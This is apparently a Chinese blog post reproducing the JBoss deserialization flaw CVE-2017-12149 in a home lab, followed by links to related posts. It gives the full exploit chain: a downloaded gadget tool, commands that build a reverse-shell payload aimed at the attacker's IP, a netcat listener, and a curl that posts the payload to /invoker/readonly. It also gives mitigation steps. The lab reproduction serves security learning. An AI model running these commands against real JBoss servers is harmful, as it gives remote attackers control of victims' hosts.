Jboss反序列化漏洞复现:CVE-2017-12149

最新推荐文章于 2024-09-20 19:39:06 发布
最新推荐文章于 2024-09-20 19:39:06 发布
阅读量3.9k 收藏 6
点赞数 1
分类专栏: Others

声明:漏洞复现过程并非原创,仅为成功搭建后给自己以及后来人的记录。侵删。

漏洞描述

近期,互联网爆出JBOSSApplication Server反序列化命令执行漏洞(CVE-2017-12149),远程攻击者利用漏洞可在未经任何身份验证的服务器主机上执行任意代码。漏洞细节和验证代码已公开,近期被不法分子利用出现大规模攻击尝试的可能性较大。漏洞危害程度为高危(High)。

影响范围

漏洞影响5.x和6.x版本的JBOSSAS。目前评估潜在受影响主机数量超过5000台2].

漏洞原理

JBOSS Application Server是一个基于J2EE的开放源代码的应用服务器。 JBoss代码遵循LGPL许可,可以在任何商业应用中免费使用,2006年,JBoss被Redhat公司收购。

2017年8月30日,厂商Redhat发布了一个JBOSSAS 5.x 的反序列化远程代码执行漏洞通告。该漏洞位于JBoss的HttpInvoker组件中的 ReadOnlyAccessFilter 过滤器中,其doFilter方法在没有进行任何安全检查和限制的情况下尝试将来自客户端的序列化数据流进行反序列化,导致攻击者可以通过精心设计的序列化数据来执行任意代码。但近期有安全研究者发现JBOSSAS 6.x也受该漏洞影响,攻击者利用该漏洞无需用户验证在系统上执行任意命令,获得服务器的控制权。

漏洞原理分析和漏洞利用分析正在进行,再次更新时会补上。

漏洞复现

环境搭建

首先进行搭建环境,这里我是用我的电脑本机和虚拟机 kali 进行的,当然你也有其他的选择。
准备阶段:
kali : 192.168.73.131
win7 : 192.168.73.128 (安装了 java 环境)

Windows7的Java环境配置

Java环境配置是基本操作了,网上都有详细教程,在这里就不详细赘述了。下载的是当前最新的jdk-1.8.0_171
这里写图片描述

Windows7的Jboss配置

1.下载jboss-as-6.1.0-final,下载下来是一个压缩包
http://jbossas.jboss.org/downloads/

2.把他解压到一个目录下,我的是C:\JBOSS\jboss-6.1.0.Final(路径最好不要有空格)

3..新建环境变量:JBOSS_HOME:值为: C:\JBOSS\jboss-6.1.0.Final
在path中加入:%JBOSS_HOME%\bin; (记得加分号隔开前一个路径)

4.完成环境变量配置后,在C:\JBOSS\jboss-6.1.0.Final\bin下打开cmd,输入call run.bat。运行bat文件。出现红标即成功。(记得不要忘了环境变量path中要有c:\system32…那个windows命令集变量,自行百度)
这里写图片描述

5.在浏览器中输入localhost:8080或127.0.0.1:8080(localhost不行可以试试这个)打开JBOSS。或者http://YourHost:8080
这里写图片描述

6.进入invoker/readonly,若显示HTTP Status 500 -,则显示漏洞存在。
这里写图片描述

Kali Linux上的监听及漏洞利用

1.反序列化工具,解压放到kali桌面即可
http://scan.javasec.cn/java/JavaDeserH2HC.zip

2.首先进入JavaDeserH2HC文件夹中

root@kali:~# cd Desktop
root@kali:~/Desktop# cd JavaDeserH2HC

2.接下来输入命令:

javac -cp .:commons-collections-3.2.1.jar ReverseShellCommonsCollectionsHashMap.java

java -cp .:commons-collections-3.2.1.jar ReverseShellCommonsCollectionsHashMap 192.168.73.131:4444IP是kali的ip,4444是下面要监听的端口,这里写哪个端口下面就要监听哪个端口)

3.打开新的终端进行监听

nc -vlp 4444

4.这个时候会同目录下生成一个ReverseShellCommonsCollectionsHashMap.ser文件,curl 这个二进制文件就可以了。

curl http://192.168.73.128:8080/invoker/readonly --data-binary @ReverseShellCommonsCollectionsHashMap.ser

这里写图片描述
这里写图片描述

漏洞防护

建议用户升级到JBOSS AS7。另,不能及时升级的用户,可采取如下临时解决方案:
1. 不需要 http-invoker.sar 组件的用户可直接删除此组件。
2. 添加如下代码至 http-invoker.sar 下 web.xml 的 security-constraint 标签中:/*用于对 http invoker 组件进行访问控制。

Agamotto丶
关注
专栏目录
漏洞复现Jboss反序列化漏洞CVE-2017-12149
飘飘飘飘飘飘飘飘飘飘飘飘飘飘飘飘飘飘飘飘飘飘飘飘飘飘飘飘飘飘飘飘
08-17 911
JBOSS Application Server是一个基于J2EE的开放源代码的应用服务器。JBoss代码遵循LGPL许可,可以在任何商业应用中免费使用CVE-2017-12149漏洞:该漏洞为 Java反序列化错误类型,存在于 Jboss 的 HttpInvoker 组件中的 ReadOnlyAccessFilter ,其doFilter方法在没有进行任何安全检查和限制的情况下尝试将来自客户端的序列化数据流进行反序列化,导致攻击者可以通过精心设计的序列化数据来执行任意代码。............
网安漏洞复现系列:漏洞复现JBoss 4.x JBossMQ JMS 反序列化漏洞CVE-2017-7504)
weixin_54626591的博客
05-06 252
漏洞复现JBoss 4.x JBossMQ JMS 反序列化漏洞CVE-2017-7504)
Jboss反序列化漏洞CVE-2017-12149复现
weixin_43736941的博客
07-24 469
Jboss反序列化漏洞CVE-2017-12149复现 漏洞描述 互联网爆出JBOSSApplication Server反序列化命令执行漏洞(CVE-2017-12149),远程攻击者利用漏洞可在未经任何身份验证的服务器主机上执行任意代码。漏洞细节和验证代码已公开,近期被不法分子利用出现大规模攻击尝试的可能性较大。漏洞危害程度为高危(High)。 漏洞原理 JBOSS Application Server是一个基于J2EE的开放源代码的应用服务器。 JBoss代码遵循LGPL许可,可以在任何商业应用中免费
CVE-2017-12149JBOSS反序列化远程代码执行漏洞漏洞复现
Jerry____的博客
12-12 4202
一:漏洞说明 JBOSS Application Server是一个基于J2EE的开放源代码的应用服务器,攻击者利用该漏洞无需用户验证在系统上执行任意命令,获得服务器的控制权。 二、影响的版本 5.x和6.x版本的JBOSSAS 三、环境搭建(目标机:192.168.33.144) 利用vulhub搭建环境 1、进入漏洞目录 cd /vulhub/jboss/CVE-2017-12149 2、搭...
Jboss CVE-2017-12149 靶场攻略
最新发布
shw_yzh的博客
09-20 301
漏洞为 Java反序列化错误类型,存在于 Jboss 的 HttpInvoker 组件中的 ReadOnlyAccessFilter过滤器中。该过滤器在没有进⾏任何安全检查的情况下尝试将来⾃客户端的数据流进⾏反序列化,从⽽导。该漏洞出现在/invoker/readonly中 ,服务器将⽤户post请求内容进⾏反序列化。返回500,说明⻚⾯存在,此⻚⾯存在反序列化漏洞。2.验证是否存在漏洞 , 访问。
JBoss 5.x和6.x 反序列化漏洞CVE-2017-12149
网络安全。
03-02 1494
0x01 漏洞简介 该漏洞为 Java反序列化错误类型,存在于 Jboss 的 HttpInvoker 组件中的 ReadOnlyAccessFilter过滤器中。该过滤器在没有进行任何安全检查的情况下尝试将来自客户端的数据流进行反序列化,从而导致了攻击者可以在服务器上执行任意代码。 0x02 漏洞版本 漏洞影响5.x和6.x版本的JBOSSAS。 0x03 漏洞原理 JBOSS Applic...
CVE-2017-12149漏洞复现
2301_80115097的博客
10-31 509
中间件及框架列表: IIS,Apache,Nginx,Tomcat,Docker,Weblogic,JBoos,WebSphere, Jenkins ,GlassFish,Jira,Struts2,Laravel,Solr,Shiro,Thinkphp, Spring,Flask,jQuery等。其他漏洞编号利用方式类似,直接放入到工具当中进行检测,存在就存在,可直接执行命令或其上传,注入等操作。环境搭建、HTML,PHP,MySQL基础学习,信息收集,SQL注入,XSS,CSRF,暴力破解等等。
关于JBoss 5.x/6.x 反序列化漏洞CVE-2017-12149)的复现
mw_myever的博客
10-06 726
一、漏洞介绍 该漏洞为 Java反序列化错误类型,存在于 Jboss 的 HttpInvoker 组件中的 ReadOnlyAccessFilter 过滤器中。该过滤器在没有进行任何安全检查的情况下尝试将来自客户端的数据流进行反序列化,从而导致了漏洞,该漏洞在内网中比较常见。 二、环境搭建 攻击机:192.168.70.2(kali) 受害机:192.168.70.3(vulhub) 利用命令:docker-compose up -d 启动环境 三、访问目标 1、探测 在kali上利用命令:
JBossMQJMS 反序列化漏洞CVE-2017-7504)漏洞利用工具
07-23
JBossMQJMS 反序列化漏洞CVE-2017-7504)是针对企业级Java消息服务(JMS)提供商JBossMQ的一个严重安全问题。该漏洞源于应用程序未能正确处理反序列化的对象,使得攻击者可以通过精心构造的恶意输入触发任意代码...
Jboss Application Server反序列化命令执行漏洞利用工具(CVE-2017-12149
07-23
2017年,它被发现存在一个严重的安全漏洞,被称为CVE-2017-12149,这是一个反序列化漏洞,允许远程攻击者通过精心构造的输入来执行任意系统命令,从而对受影响的系统造成严重威胁。 反序列化是将已序列化的对象...
漏洞复现JBoss反序列化漏洞(CVE-2017-12149)
cj_Hydra's Blog
05-18 2857
前言: JBoss 反序列化漏洞,该漏洞位于JBoss的HttpInvoker组件中的 ReadOnlyAccessFilter 过滤器中,其doFilter方法在没有进行任何安全检查和限制的情况下尝试将来自客户端的序列化数据流进行反序列化,导致恶意访问者通过精心设计的序列化数据执行任意代码。但近期有安全研究者发现JBossAS 6.x也受该漏洞影响,恶意访问者利用该漏洞无需用户验证即可获得服务器的控制权。该漏洞的细节和验证代码已公开,为避免造成损失,建议及时修复升级至JBossAS 7版本 影响版本:
Jboss反序列化漏洞复现(CVE-2017-12149)
WY92139010的博客
07-30 733
Jboss反序列化漏洞复现(CVE-2017-12149) 一、漏洞描述 该漏洞为Java反序列化错误类型,存在于jboss的HttpInvoker组件中的ReadOnlyAccessFilter过滤器中。该过滤器在没有进行任何安全检查的情况下尝试将来自客户端的数据流进行反序列化,从而导致了漏洞。 二、漏洞影响版本 Jboss 5.x Jboss 6.x 三、漏洞复现环境搭建...
vulhub-jboss-CVE-2017-12149漏洞复现
m0_62008601的博客
09-18 1569
Jboss是一个基于J2EE的开放源代码的应用服务器。JBoss代码遵循LGPL许可,可以在任何商业应用中免费使用。JBoss是一个管理EJB的容器和服务器,支持EJB 1.1、EJB 2.0和EJB3的规范。Jboss属于redhat公司,而且jboss是开源的,免费的,且在J2EE应用服务器领域,JBoss是发展最为迅速的应用服务器,所以曾经广为流行。该漏洞出现在请求中,服务器将用户提交的POST内容进行了Java反序列化:(该图像来源于vulhub官方wp中)
CVE-2017-12149漏洞复现--003
growler67
08-29 1243
0x01-漏洞简介 这两天闲着没事,在研究中间件漏洞,今天我们就来复现一下CVE-2017-12149,此漏洞是jboos中间件的一个反序列化漏洞JBoss是一个管理EJB的容器和服务器,支持EJB 1.1、EJB 2.0和EJB3的规范。在/invoker/readonly路径下,攻击者可以构造序列化代码传入服务器进行反序列化,由于没有对反序列化操作进行任何检测,导致攻击者可以执行任意代码。 0x02- 影响版本 JBoss 5.x / 6.x 0x03-环境搭建 1)下载 本次漏洞复现在win7上搭建
CVE-2017-12149复现
看不尽的尘埃——博客
11-19 924
漏洞名称:JBOOS AS 6.X 反序列化漏洞 CVE编号:CVE-2017-12149 漏洞等级:高危 影响版本:5.x和6.x版本 漏洞描述及原理:2017年8月30日,厂商Redhat发布了一个JBOSSAS 5.x 的反序列化远程代码执行漏洞通告。该漏洞位于JBoss的HttpInvoker组件中的 ReadOnlyAccessFilter 过滤器中,其doFilter方法在没...
【vulhub】JBOSS 5.x/6.x 反序列化远程代码执行漏洞CVE-2017-12149复现
qq_45300786的博客
04-14 1229
一、漏洞说明 JBOSS Application Server是一个基于J2EE的开放源代码的应用服务器,攻击者利用该漏洞无需用户验证在系统上执行任意命令,获得服务器的控制权。该漏洞为 Java反序列化错误类型,存在于 Jboss 的 HttpInvoker 组件中的 ReadOnlyAccessFilter 过滤器中。该过滤器在没有进行任何安全检查的情况下尝试将来自客户端的数据流进行反序列化,从而导致了漏洞。 二、影响的版本 5.x和6.x版本的JBOSSAS 三、搭建环境 docker-compose
Jboss 反序列化复现
温和的跳跃
07-20 259
bingo 复现过程中 我想到一件让我恶心的事情,我自己觉得自己恶心 也觉得别人恶心。。。然后成功忘记想输入的命令。 都大同小异 比较好奇的是工具使用 还有源码怎么找 具体原理分析一个礼拜以后再写 ...
CVE-2017-12149 复现及修复
weixin_46580614的博客
07-24 6004
CVE-2017-12149 复现及修复 漏洞名称:JBOOS AS 6.X 反序列化漏洞 CVE编号:CVE-2017-12149 漏洞等级:高危 影响版本:5.x和6.x版本 漏洞描述及原理:2017年8月30日,厂商Redhat发布了一个JBOSSAS 5.x 的反序列化远程代码执行漏洞通告。该漏洞位于JBoss的HttpInvoker组件中的 ReadOnlyAccessFilter 过滤器中,其doFilter方法在没有进行任何安全检查和限制的情况下尝试将来自客户端的序列化数据流进行反序列化,导致
JBoss 5.x/6.x 反序列化漏洞CVE-2017-12149复现
薛定谔嘚喵博客
05-11 680
漏洞为 Java反序列化错误类型,存在于 Jboss 的 HttpInvoker 组件中的 ReadOnlyAccessFilter 过滤器中。该过滤器在没有进行任何安全检查的情况下尝试将来自客户端的数据流进行反序列化,从而导致了漏洞
CVE-2017-12149 Jboss反序列化漏洞利用工具
文件名称“jboss-_CVE-2017-12149”直接反映了该压缩包内含的工具功能和针对的漏洞,这表明用户在解压缩后可以找到与CVE-2017-12149漏洞利用相关的文件和工具。 通过以上知识点的详细说明,可以更深入地理解Jboss ...
评论 1
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值